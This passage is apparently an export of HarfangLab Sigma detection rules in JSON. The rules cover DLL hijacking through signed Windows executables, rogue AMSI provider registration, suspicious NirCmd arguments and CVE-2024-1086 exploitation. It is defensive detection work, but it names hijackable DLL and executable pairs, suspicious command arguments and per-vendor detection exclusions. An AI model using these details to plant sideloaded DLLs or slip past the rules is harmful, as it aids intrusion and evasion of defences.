Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad688ec6-d5b4-4404-bd3c-dfd831dd35a1",
"rule_name": "DLL Hijacking via aitstatic.exe",
"rule_description": "Detects potential Windows DLL Hijacking via aitstatic.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad743e1e-6f61-4a51-9e3f-7568d116265e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589999Z",
"creation_date": "2026-03-23T11:45:34.590003Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590011Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cloudnotifications.yml",
"content": "title: DLL Hijacking via CloudNotifications.exe\nid: ad743e1e-6f61-4a51-9e3f-7568d116265e\ndescription: |\n Detects potential Windows DLL Hijacking via CloudNotifications.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CloudNotifications.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\uianimation.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad743e1e-6f61-4a51-9e3f-7568d116265e",
"rule_name": "DLL Hijacking via CloudNotifications.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CloudNotifications.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad7629c3-3ff9-463b-9a5d-e23eedac07fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097409Z",
"creation_date": "2026-03-23T11:45:34.097411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097415Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/amsi/dev-audience",
"https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/",
"https://persistence-info.github.io/Data/amsi.html",
"https://github.com/netbiosX/AMSI-Provider",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1112_amsi_persistence.yml",
"content": "title: AMSI Provider Added in Registry\nid: ad7629c3-3ff9-463b-9a5d-e23eedac07fc\ndescription: |\n Detects the registration of an Antimalware Scan Interface (AMSI) provider in the registry.\n AMSI is a Windows defense mechanism designed to combat fileless malwares.\n Adversaries can register a malicious AMSI provider to run malicious code whenever the AMSI is triggered to achieve persistence and defense evasion.\n AMSI provider registrations must come from security products such as anti-virus or EDR.\n The AMSI DLL path can be find in registry location HKCR\\CLSID\\\\InProcServer32\\(Default).\n It is recommended to ensure the legitimacy of this action by analyzing the DLL pointed to by the registered CLSID in registry or by investigating the process responsible for the registry modification.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/amsi/dev-audience\n - https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/\n - https://persistence-info.github.io/Data/amsi.html\n - https://github.com/netbiosX/AMSI-Provider\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/11/14\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.persistence\n - attack.t1112\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{????????-????-????-????-????????????}\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_programfiles:\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - ProcessImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - ProcessCommandLine|contains:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_defender:\n ProcessImage|endswith: '\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_defender_unsigned:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}'\n\n exclusion_cyberreason:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n - 'Cybereason, Inc.'\n\n exclusion_sentinelone:\n ProcessSigned: 'true'\n ProcessSignature: 'SentinelOne, Inc.'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_panda:\n ProcessSigned: 'true'\n ProcessSignature: 'Panda Security S.L.'\n\n exclusion_eset:\n - ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n - ProcessParentImage|endswith: '\\ekrn.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'ESET, spol. s r.o.'\n - ProcessCommandLine|contains: '?:\\Program Files\\ESET\\ESET Security\\'\n\n exclusion_malwarebyte:\n - ProcessSigned: 'true'\n ProcessSignature:\n - 'Malwarebytes Inc.'\n - 'Malwarebytes Inc'\n - ProcessParentImage:\n - '?:\\Program Files\\Malwarebytes Endpoint Agent\\MBCloudEA.exe'\n - '?:\\Program Files\\Malwarebytes Endpoint Agent\\EAPluginHost.exe'\n\n exclusion_trendmicro:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{6138A34F-DCA4-48D0-95CC-51E1D8F30B58}'\n - 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2856EFBF-914D-4EC1-8E69-1259D5823EC1}'\n\n exclusion_fsecure:\n ProcessCommandLine: 'regsvr32.exe /s ?:\\Program Files (x86)\\F-Secure\\\\*\\fsamsi64.dll'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{567C4BA7-5B5D-4947-92E8-4691CC4C77DD}'\n\n exclusion_mcafee:\n - ProcessSigned: 'true'\n ProcessSignature:\n - 'Musarubra US LLC'\n - 'McAfee, Inc.'\n - ProcessParentImage: '?:\\Program Files\\McAfee\\\\*\\mc-fw-host.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{08B5D5DE-93CC-4B76-BB44-4C3A00F1E629}'\n - ProcessCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{436D0575-3FCC-49C2-9E9C-5772A341E1D5}'\n - ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\Common Files\\McAfee\\Installer\\McInst.exe'\n - '?:\\Program Files (x86)\\Common Files\\McAfee\\Installer\\\\*\\McInst.exe'\n\n exclusion_avg:\n ProcessSigned: 'true'\n ProcessSignature: 'AVG Technologies USA, LLC'\n\n exclusion_crowdstrike:\n ProcessImage: '?:\\Program Files\\CrowdStrike\\CSFalconService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Hardware Compatibility Publisher'\n\n exclusion_vmware:\n ProcessSigned: 'true'\n ProcessSignature: 'Broadcom Inc'\n\n exclusion_kaspersky:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n\n exclusion_avast:\n ProcessSigned: 'true'\n ProcessSignature: 'Avast Software s.r.o.'\n\n exclusion_sophos:\n ProcessSigned: 'true'\n ProcessSignature: 'Sophos Ltd'\n\n exclusion_checkpoint:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\CheckPoint\\Endpoint Security\\EFR\\EFRService.exe'\n - '?:\\Program Files\\CheckPoint\\Endpoint Security\\EFR\\EFRService.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{00FACAAE-5213-42C7-9B65-123AE71013A9}'\n\n exclusion_fortinet:\n ProcessCommandLine: '?:\\Windows\\System32\\regsvr32.exe /s ?:\\Program Files\\Fortinet\\FortiClient\\FortiAmsi.dll'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2E5D8A62-77F9-4F7B-A90C-2744820139B2}'\n\n exclusion_symantec:\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_webroot:\n ProcessSigned: 'true'\n ProcessSignature: 'Webroot Inc.'\n\n exclusion_cylance:\n ProcessParentImage: '?:\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{053AEAAE-5F1A-4A07-9A75-175AD71D53F8}'\n\n exclusion_gdata:\n ProcessParentImage: '?:\\ProgramData\\G Data\\Setups\\tmp\\setup.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{575001B9-9064-4049-B30E-D83C678E5E2A}'\n\n exclusion_norton:\n ProcessImage: '?:\\Program Files\\Norton\\Suite\\RegSvr.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{DC650FC4-FFD8-4C05-B3A5-F7A94D5629CC}'\n\n exclusion_avkproxy:\n ProcessParentImage: '?:\\Program Files (x86)\\G Data\\Setup\\Client\\SetupSVC.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{575001B9-9064-4049-B30E-D83C678E5E2A}'\n\n exclusion_avira:\n ProcessImage: '?:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n\n exclusion_fidelis:\n ProcessParentImage: '?:\\Program Files\\Fidelis\\Endpoint\\Platform\\services\\protect\\protect.exe'\n\n exclusion_cisco:\n ProcessSigned: 'true'\n ProcessSignature: 'Cisco Systems, Inc.'\n\n exclusion_tmasmi:\n ProcessCommandLine: '?:\\Windows\\system32\\regsvr32.exe /s ?:\\Windows\\system32\\TmAMSI\\TmAMSIProvider64.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad7629c3-3ff9-463b-9a5d-e23eedac07fc",
"rule_name": "AMSI Provider Added in Registry",
"rule_description": "Detects the registration of an Antimalware Scan Interface (AMSI) provider in the registry.\nAMSI is a Windows defense mechanism designed to combat fileless malwares.\nAdversaries can register a malicious AMSI provider to run malicious code whenever the AMSI is triggered to achieve persistence and defense evasion.\nAMSI provider registrations must come from security products such as anti-virus or EDR.\nThe AMSI DLL path can be find in registry location HKCR\\CLSID\\\\InProcServer32\\(Default).\nIt is recommended to ensure the legitimacy of this action by analyzing the DLL pointed to by the registered CLSID in registry or by investigating the process responsible for the registry modification.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad9a4851-d601-4528-a0d2-a3d77b050741",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295767Z",
"creation_date": "2026-03-23T11:45:35.295770Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295777Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf",
"https://www.nirsoft.net/utils/nircmd.html",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1059_suspicious_execution_of_nircmd.yml",
"content": "title: Suspicious NirCmd Execution\nid: ad9a4851-d601-4528-a0d2-a3d77b050741\ndescription: |\n Detects a suspicious execution of the NirCmd.\n NirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\n It can also be used by attackers to execute commands while evading defenses.\n This rule detects the usage of suspicious arguments, usually used by attackers.\n It is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf\n - https://www.nirsoft.net/utils/nircmd.html\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NirCmd\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - OriginalFileName: 'nircmd.exe'\n - Image|endswith: '\\nircmd.exe'\n\n selection_path:\n - Image:\n - '?:\\nircmd.exe'\n # AtomicRedTeam\n - '*\\ExternalPayloads\\nircmd.exe'\n - Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n selection_suspicious_commandline:\n CommandLine|contains:\n - ' elevatecmd '\n - ' execmd '\n - ' exec '\n - ' exec2 '\n - ' runassystem '\n - ' service '\n - ' savescreenshot '\n - ' savescreenshotfull '\n\n exclusion_mpladmin:\n ParentImage|endswith: '\\MPLAdmin.exe'\n\n # C:\\Program Files\\QGIS 2.18\\bin\\nircmd.exe exec hide C:\\PROGRA~1\\QGIS2~1.18\\bin\\qgis.bat\n # nircmd shortcut C:\\PROGRA~1\\QGIS3~1.16\\bin\\nircmd.exe C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\QGIS 3.16 Qt Designer with QGIS 3.16.4 custom widgets exec hide \"C:\\PROGRA~1\\QGIS3~1.16\\bin\\qgis-ltr-designer.bat\" C:\\PROGRA~1\\QGIS3~1.16\\apps\\qgis-ltr\\icons\\QGIS.ico ~$folder.mydocuments$\n exclusion_qgis:\n - CommandLine:\n - '?:\\Program Files\\QGIS*\\bin\\nircmd.exe exec hide ?:\\\\*\\\\*.bat'\n - '?:\\Program Files\\QGIS*\\bin\\nircmd.exe exec hide ?:\\\\*\\\\*.bat *'\n - '?:\\Program Files (x86)\\QGIS*\\bin\\nircmd.exe exec hide ?:\\\\*\\\\*.bat'\n - '*\\QGIS\\bin\\nircmd.exe exec hide *\\QGIS\\bin\\qgis.bat'\n - '*\\Qgis*\\bin\\nircmd.exe exec hide *\\Qgis*\\bin\\\\*.bat'\n - 'nircmd shortcut ?:\\\\*\\nircmd.exe * exec hide *?:\\\\*\\bin\\\\*.bat* *'\n - 'nircmd shortcut *\\Qgis*\\bin\\nircmd.exe * exec hide *\\Qgis*\\bin\\\\*.bat *'\n - ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c etc\\postinstall\\qgis*.bat'\n\n exclusion_santesocial:\n - Image: '?:\\ProgramData\\santesocial\\galss\\inf\\nircmd.exe'\n - CommandLine: '?:\\Program Files (x86)\\santesocial\\srvsvcnam\\nircmd.exe exec hide *.bat'\n ParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_token2:\n Image|endswith: '\\scrn.dll'\n ProcessParentProduct: 'USB Config Tool'\n ProcessParentCompany: 'TOKEN2'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad9a4851-d601-4528-a0d2-a3d77b050741",
"rule_name": "Suspicious NirCmd Execution",
"rule_description": "Detects a suspicious execution of the NirCmd.\nNirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\nIt can also be used by attackers to execute commands while evading defenses.\nThis rule detects the usage of suspicious arguments, usually used by attackers.\nIt is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ada4546b-ac75-4f2a-bef1-78bc2ae66763",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613840Z",
"creation_date": "2026-03-23T11:45:34.613844Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613851Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pwning.tech/nftables/",
"https://github.com/Notselwyn/CVE-2024-1086",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_cve_2024_1086_exploitation.yml",
"content": "title: Netfilter CVE-2024-1086 Vulnerability Exploited\nid: ada4546b-ac75-4f2a-bef1-78bc2ae66763\ndescription: |\n Detects the exploitation of CVE-2024-1086 related to a vulnerability in the Linux kernel's netfilter, affecting Linux kernels between v5.14 and v6.6.\n This vulnerability abuses a use-after-free in the nf_tables subsystem that can be exploited to achieve local privilege escalation.\n It is recommended to investigate both the command launched by this shell and all the processes executed before this alert.\nreferences:\n - https://pwning.tech/nftables/\n - https://github.com/Notselwyn/CVE-2024-1086\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/03/28\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-1086\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2024-1086\n - classification.Linux.Exploit.Netfilter\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentCommandLine|endswith: ' /proc/*/fd/* -q -- binfmt-????'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ada4546b-ac75-4f2a-bef1-78bc2ae66763",
"rule_name": "Netfilter CVE-2024-1086 Vulnerability Exploited",
"rule_description": "Detects the exploitation of CVE-2024-1086 related to a vulnerability in the Linux kernel's netfilter, affecting Linux kernels between v5.14 and v6.6.\nThis vulnerability abuses a use-after-free in the nf_tables subsystem that can be exploited to achieve local privilege escalation.\nIt is recommended to investigate both the command launched by this shell and all the processes executed before this alert.\n",
"rule_creation_date": "2024-03-28",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae0999e2-bd3b-4165-acbc-157ab979e14f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081131Z",
"creation_date": "2026-03-23T11:45:34.081133Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081137Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoft_uev_synccontroller.yml",
"content": "title: DLL Hijacking via Microsoft.Uev.SyncController.exe\nid: ae0999e2-bd3b-4165-acbc-157ab979e14f\ndescription: |\n Detects potential Windows DLL Hijacking via Microsoft.Uev.SyncController.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Microsoft.Uev.SyncController.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae0999e2-bd3b-4165-acbc-157ab979e14f",
"rule_name": "DLL Hijacking via Microsoft.Uev.SyncController.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Microsoft.Uev.SyncController.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae29f29b-fc65-464d-a199-837b6e64b76d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
